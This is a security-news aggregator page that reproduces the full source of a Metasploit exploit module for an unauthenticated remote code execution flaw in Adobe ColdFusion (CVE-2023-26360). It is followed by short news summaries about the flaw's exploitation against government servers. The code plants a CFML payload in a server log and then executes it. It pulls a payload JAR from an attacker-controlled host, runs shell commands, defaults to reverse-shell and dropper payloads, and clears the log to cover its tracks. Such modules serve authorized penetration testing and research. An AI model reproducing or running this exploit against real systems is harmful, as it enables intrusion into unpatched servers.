Security
Headlines
HeadlinesLatestCVEs

Headline

Adobe ColdFusion Unauthenticated Remote Code Execution

This Metasploit module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to gain remote code execution.

Packet Storm
#vulnerability#web#windows#linux#js#git#java#rce#perl#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe          ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in          order to gain remote code execution.        },        'License' => MSF_LICENSE,        'Author' => [          'sf', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-26360'],          ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis']        ],        'DisclosureDate' => '2023-03-14',        'Platform' => %w[java win linux unix],        'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux.        'WfsDelay' => 30,        'Targets' => [          [            'Generic Java',            {              'Type' => :java,              'Platform' => 'java',              'Arch' => [ ARCH_JAVA ],              'DefaultOptions' => {                'PAYLOAD' => 'java/meterpreter/reverse_tcp'              }            },          ],          [            'Windows Command',            {              'Type' => :cmd,              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            },          ],          [            'Windows Dropper',            {              'Type' => :dropper,              'Platform' => 'win',              'Arch' => [ ARCH_X86, ARCH_X64 ],              'CmdStagerFlavor' => [ 'certutil', 'psh_invokewebrequest' ],              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Type' => :cmd,              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_perl'              }            },          ],          [            'Linux Dropper',            {              'Type' => :dropper,              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            # The following artifacts will be left on disk:            # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary)            # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class            # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class            # If a dropper payload was used, a file with a random name may be left.            # * Windows: C:\Windows\Temp\XXXXXX.exe            # * Linux: /tmp/XXXXXX            ARTIFACTS_ON_DISK,            # The following logs will contain IOCs:            # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log            # C:\ColdFusion2021\cfusion\logs\exception.log            # C:\ColdFusion2021\cfusion\logs\application.log            IOC_IN_LOGS          ],          'RelatedModules' => [            'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360'          ]        }      )    )    register_options(      [        Opt::RPORT(8500),        OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),        OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),        OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => '/'    )    return CheckCode::Unknown('Connection failed') unless res    # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint    # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present.    # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69    if res.get_cookies =~ /(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|.cfusion/      return CheckCode::Detected('ColdFusion detected but version number is unknown.')    end    CheckCode::Unknown  end  def exploit    unless datastore['CFC_ENDPOINT'].end_with?('.cfc')      fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file')    end    case target['Type']    when :java      # Start the HTTP server      start_service      # Trigger a loadClass request via java.net.URLClassLoader      trigger_urlclassloader      # Handle the payload...      handler    when :cmd      execute_command(payload.encoded)    when :dropper      execute_cmdstager    end  end  def on_request_uri(cli, _req)    if target['Type'] == :java      print_status('Received payload request, transmitting payload jar...')      send_response(cli, payload.encoded, {        'Content-Type' => 'application/java-archive',        'Connection' => 'close',        'Pragma' => 'no-cache'      })    else      super    end  end  def trigger_urlclassloader    # Here we construct a CFML payload to load a Java payload via URLClassLoader.    # NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned.    cf_url = Rex::Text.rand_text_alpha_lower(4)    srvhost = datastore['SRVHOST']    # Ensure SRVHOST is a routable IP address to our RHOST.    if Rex::Socket.addr_atoi(srvhost) == 0      srvhost = Rex::Socket.source_address(rhost)    end    # Create a URL pointing back to our HTTP server.    cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"    cf_reflectarray = Rex::Text.rand_text_alpha_lower(4)    # Get a reference to java.lang.reflect.Array so we can create a URL[] instance.    cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>"    cf_array = Rex::Text.rand_text_alpha_lower(4)    # Create a URL[1] instance.    cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>"    # Set the first element in the array to our URL.    cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>"    cf_loader = Rex::Text.rand_text_alpha_lower(4)    # Create a URLClassLoader instance.    cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>"    # Load the remote JAR file and instantiate an instance of metasploit.Payload.    cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>"    execute_cfml(cfc_payload)  end  def execute_command(cmd, _opts = {})    cf_param = Rex::Text.rand_text_alpha_lower(4)    # If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags.    cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>"    # Set our cf_param with the data in the requests form data, this is the command to run.    cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>"    # Here we construct a CFML payload to stage the :cmd and :dropper commands...    shell_name = nil    shell_arg = nil    case target['Platform']    when 'win'      shell_name = 'cmd.exe'      shell_arg = '/C'    when 'linux', 'unix'      shell_name = '/bin/sh'      shell_arg = '-c'    end    cf_array = Rex::Text.rand_text_alpha_lower(4)    # Create an array of arguments to pass to exec()    cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>"    cf_runtime = Rex::Text.rand_text_alpha_lower(4)    # Get a reference to the java.lang.Runtime class.    cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>"    # Call the static Runtime.exec method to execute our string array holding the command and the arguments.    cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>"    # The end of the If tag.    cfc_payload << '</cfif>'    execute_cfml(cfc_payload, cf_param, cmd)  end  def execute_cfml(cfml, param = nil, param_data = nil)    cfc_payload = '<cftry>'    cfc_payload << cfml    cfc_payload << "<cfcatch type='any'>"    cfc_payload << '</cfcatch>'    cfc_payload << '<cffinally>'    # Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands.    # GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the    # template we are executing.    cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>"    cfc_payload << '</cffinally>'    cfc_payload << '</cftry>'    # We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here.    unless cfc_payload.length < 950      fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file')    end    # We dont need to call a valid CFC method, so we just create a random method name to supply to the server.    cfc_method = Rex::Text.rand_text_alpha_lower(1..8)    # Perform the request that writes the cfc_payload to the CF_LOGFILE.    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['CFC_ENDPOINT']),      'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },      'vars_post' => { '_variables' => "{#{cfc_payload}" }    )    unless res && res.code == 200 && res.body.include?('<title>Error</title>')      fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file')    end    # The relative path from wwwroot to the CF_LOGFILE.    cflog_file = datastore['CF_LOGFILE']    # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters    # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name.    if target['Platform'] == 'win'      classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}"    else      classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}"    end    json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}"    vars_post = { '_variables' => json_variables }    unless param.nil? || param_data.nil?      vars_post[param] = param_data    end    # Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be    # executed as a parameter which will in turn be read back out by the CFML in the cfc_payload.    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(datastore['CFC_ENDPOINT']),      'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' },      'vars_post' => vars_post    )    unless res && res.code == 200 && res.body.include?('<title>Error</title>')      fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file')    end  endend

Related news

Chinese-Speaking Hacker Group Targets Human Rights Studies in Middle East

Unnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023. "Sighting this group's [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them," Kaspersky

Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

Adobe ColdFusion versions 2018,15 and below and versions 2021,5 and below suffer from an arbitrary file read vulnerability.

Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers

By Deeba Ahmed CISA Warns of Critical Adobe ColdFusion Vulnerability Actively Exploited by Threat Actors. This is a post from HackRead.com Read the original post: Adobe ColdFusion Flaw Used by Hackers to Access US Govt Servers

Adobe Coldfusion vulnerability used in attacks on government servers

CISA has published an advisory about a vulnerability in Adobe Coldfusion used in two attacks against federal agencies.

Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a high-severity Adobe ColdFusion vulnerability by unidentified threat actors to gain initial access to government servers. "The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution,"

Adobe ColdFusion vulnerability exploited in the wild

Categories: Exploits and vulnerabilities Categories: News Tags: Adobe Tags: ColdFusion Tags: CVE-2023-26359 Tags: CVE-2023-26360 Tags: critical Tags: known exploited Tags: deserialization A second Adobe ColdFusion vulnerability that was patched in April has been added to CISA's known exploited vulnerabilities catalog. (Read more...) The post Adobe ColdFusion vulnerability exploited in the wild appeared first on Malwarebytes Labs.

Critical Adobe ColdFusion Flaw Added to CISA's Exploited Vulnerability Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability, cataloged as CVE-2023-26359 (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 (

CVE-2023-26361: Adobe Security Bulletin

Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in Arbitrary file system read. Exploitation of this issue does not require user interaction, but does require administrator privileges.

CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. "Adobe ColdFusion

Update now! Microsoft fixes two zero-day bugs

Categories: Exploits and vulnerabilities Categories: News Tags: patch Tuesday Tags: March Tags: 2023 Tags: Microsoft Tags: Adobe Tags: Fortinet Tags: Android Tags: SAP Tags: CVE-2023-23397 Tags: CVE-2023-24880 Tags: CVE-2023-26360 Tags: CVE-2022-41328 This Patch Tuesday, Microsoft has released fixes for two actively exploited zero-days and Adobe has fixed one. (Read more...) The post Update now! Microsoft fixes two zero-day bugs appeared first on Malwarebytes Labs.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution